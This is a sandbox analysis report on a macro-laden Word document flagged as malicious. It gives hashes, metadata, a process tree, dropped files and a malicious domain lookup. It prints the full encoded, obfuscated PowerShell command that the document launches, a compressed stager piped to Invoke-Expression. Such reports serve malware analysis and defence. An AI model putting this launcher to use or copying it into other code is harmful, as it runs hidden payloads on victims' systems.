analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

58f34c29eca9f1b7c2bf07f61cab6fe58765cc60c7e1fe70c410368bbd0acf4d

Full analysis: https://app.any.run/tasks/757818fd-169c-41f5-bd19-1b7b82fec987
Verdict: Malicious activity
Analysis date: July 11, 2019, 18:13:54
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: o, Subject: offxzitiuhvzqdnpsdrfpsnkzm, Author: rpcetswsbjeaqbzukegpe, Comments: nlpkrbipnmzttpwgigadgqrx, Template: Normal, Last Saved By: Windows, Revision Number: 11, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:00, Create Time/Date: Thu Apr 19 19:59:00 2018, Last Saved Time/Date: Wed Jul 3 09:29:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

348C81922070F9236CE1B8DF6A5789C5

SHA1:

6E8656EFC9CD666C1E3DC56F90A88122D56BB567

SHA256:

58F34C29ECA9F1B7C2BF07F61CAB6FE58765CC60C7E1FE70C410368BBD0ACF4D

SSDEEP:

1536:4p5EOay+YyfuUmywQmBVHxyJDu3FHQgJw:M2ifyFMVHxlHQgJ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 1808)
    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 1808)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2896)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1808)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 1808)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
  • Название
  • 1
TitleOfParts:
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 1
Paragraphs: 1
Lines: 1
Bytes: 23552
Company: ii
Manager: wsuxnqf
CodePage: Windows Cyrillic
Security: None
Characters: 1
Words: -
Pages: 1
ModifyDate: 2019:07:03 08:29:00
CreateDate: 2018:04:19 18:59:00
TotalEditTime: 3.0 minutes
Software: Microsoft Office Word
RevisionNumber: 11
LastModifiedBy: Пользователь Windows
Template: Normal
Comments: nlpkrbipnmzttpwgigadgqrx
Keywords: -
Author: rpcetswsbjeaqbzukegpe
Subject: offxzitiuhvzqdnpsdrfpsnkzm
Title: o
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1808"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\58f34c29eca9f1b7c2bf07f61cab6fe58765cc60c7e1fe70c410368bbd0acf4d.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2896"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Enco IAAoACAALgAoACcATgBFAFcAJwArACcALQBvAGIAJwArACcASgAnACsAJwBFAGMAVAAnACkAIAAgAFMAWQBTAHQARQBNAGAALgBpAG8AYAAuAGMATwBtAFAAcgBgAEUAYABzAFMAaQBPAGAATgAuAGQARQBgAEYAbABhAFQAZQBgAFMAdAByAGUAQQBtACgAWwBzAHkAUwB0AGUAbQAuAEkATwAuAE0ARQBNAE8AcgBZAHMAdAByAGUAQQBtAF0AWwBzAFkAUwBUAGUATQAuAEMATwBOAFYAZQByAFQAXQA6ADoAZgBSAG8AbQBCAEEAcwBlADYANABzAFQAUgBpAG4ARwAoACcAUgBZAC8AQgBiAG8ASgBBAEcASQBUAHYAVABmAG8ATwBlADYAQgBaAEMASABWAEoAbABLAFkAVwBRAHAAcABXAHIAQwBGAHAAMABDAGkAMgBoADcAYQBKAFEAUAArAFYAcgBjAGkAdQA3AEMASgBWAHcAcgB1AFgAZwA5AFgATAB6AEcAVgBtADgAbwAzAEcAMwB2AGoAdwAvAHIAbABDAEgAcwBJADAAUwB4AFkANwA3AEcAcQBUAGQATABxAE0ANABoAGQAUABnADIATAB2AFYAQgBKAEsAVQBYAEwASwBjAGoARAB4AEoAegBhADEAVQA4AEgARQBCAEgANgBoAFMAMwBPAGIAUABpAHkALwBQAGEATABqAEEAcABzAFkANgBoADcAdgBMAFAAbQBCAFYARwBFAEQAaABiAEMASwBWAHEAUwBHAFoARABWADYAWgBSAEIARwByAHIAYQB2ADUAdgA3ADAANgBUAGoAeQBjAEsAYQBVAGMAQwB4AEwAYwBaADQAZgArAC8AMwBpAGoAcgBDAEMAYwBvAHYAVgBPADYAcwBXAGMAawBOAEUASgBoADUAegBqADgASgBoAFEARABZAFMARQB5AGwAeQBwAG4AUgA4AGcAdwAyAFgAOABoAEwAaQBOAE4ATwAxAFkAQwBhADIAZABzAGoAZQBFAFMAdgBRAGUAZABoAG8AVgBIAGwAbwBUAGwAagBFADUAMwBXAFkAOAA5AGkAbgBRAFQANgArAEYARwA3AFIALwAwAG4ARABEAFMAagBTADkAWQA1ACsAQQBxAG8AWABkAE8AZwBLAE8AdABsADIANwBPAGMASQB5AGMAZgBoAFIARwBXAG8AdAB3AGIAVQB0AHcAZABEADIAMABEAE4AaAA4AC8AaQBkAGMARwBsAFkAcQBrAGsAcwA1AEsAbgBJAE8AVwBYADQAeQB5AGkAZQBLADcAMAB5ADMAagBTAGsAVwA3AGMAdABrADEAagBsAFcAWgBOADIAMQA1AGYALwBRAEUAPQAnACkAIAAsAFsAcwBZAHMAVABlAG0ALgBpAG8ALgBjAE8ATQBwAFIAZQBTAHMAaQBPAE4ALgBDAG8AbQBwAHIARQBTAFMASQBPAE4AbQBPAGQAZQBdADoAOgBEAEUAQwBvAG0AcAByAGUAUwBTACAAKQB8ACYAKAAnAGYAJwArACcAbwByAGUAJwArACcAYQBjAEgAJwApAHsAIAAmACgAJwBOAEUAVwAtAG8AYgAnACsAJwBKACcAKwAnAEUAYwBUACcAKQAgACAAaQBgAG8ALgBgAFMAYABUAHIAZQBhAG0AUgBlAGEAZABlAFIAKAAkAF8ALABbAHMAeQBTAFQAZQBtAC4AVABFAHgAVAAuAEUATgBjAG8AZABJAG4ARwBdADoAOgBhAHMAQwBpAGkAKQAgAH0AfAAuACgAJwBGAG8AcgBFAGEAJwArACcAQwAnACsAJwBIACcAKQB7ACQAXwAuAHIAZQBhAEQAdABvAGUATgBkACgAKQAgAH0AIAApACAAfAAuACgAJwBJACcAKwAnAGUAeAAnACkAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 067
Read events
897
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
1808WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRDA77.tmp.cvr
MD5:
SHA256:
2896powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\25LGCUPB65VMD59S35U9.temp
MD5:
SHA256:
1808WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:0BFF127B8A57937403D4B36AF6443371
SHA256:97C662220D8EAB1417BB00E74ACFDD15F9C76F0C00671F01DE8AD4CD3C6BCCFE
2896powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFce42b.TMPbinary
MD5:E4D9C442DD447A8FA05F9CFE88FCBB69
SHA256:EDD7D7597C6C79A1DFD3229A1FA23433329B1D8399EB558623FFF948D3BB4036
2896powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:E4D9C442DD447A8FA05F9CFE88FCBB69
SHA256:EDD7D7597C6C79A1DFD3229A1FA23433329B1D8399EB558623FFF948D3BB4036
1808WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$f34c29eca9f1b7c2bf07f61cab6fe58765cc60c7e1fe70c410368bbd0acf4d.docpgc
MD5:3F224BDB4D3AD35F1B1F5E3C13B0F088
SHA256:6439589599C66C81D7685D23AA2A2E90C1878332534DAB0CD529A9FCB710BDB9
1808WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:F8D8D2557A0ECBF4C79C5CD60343F3C7
SHA256:96893DE5CC6DD68600A140E6EF2236887D0A3E78259E53DF02BBAC5F21F8453C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
4
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

Domain
IP
Reputation
toolz22n5.info
malicious

Threats

No threats detected
No debug info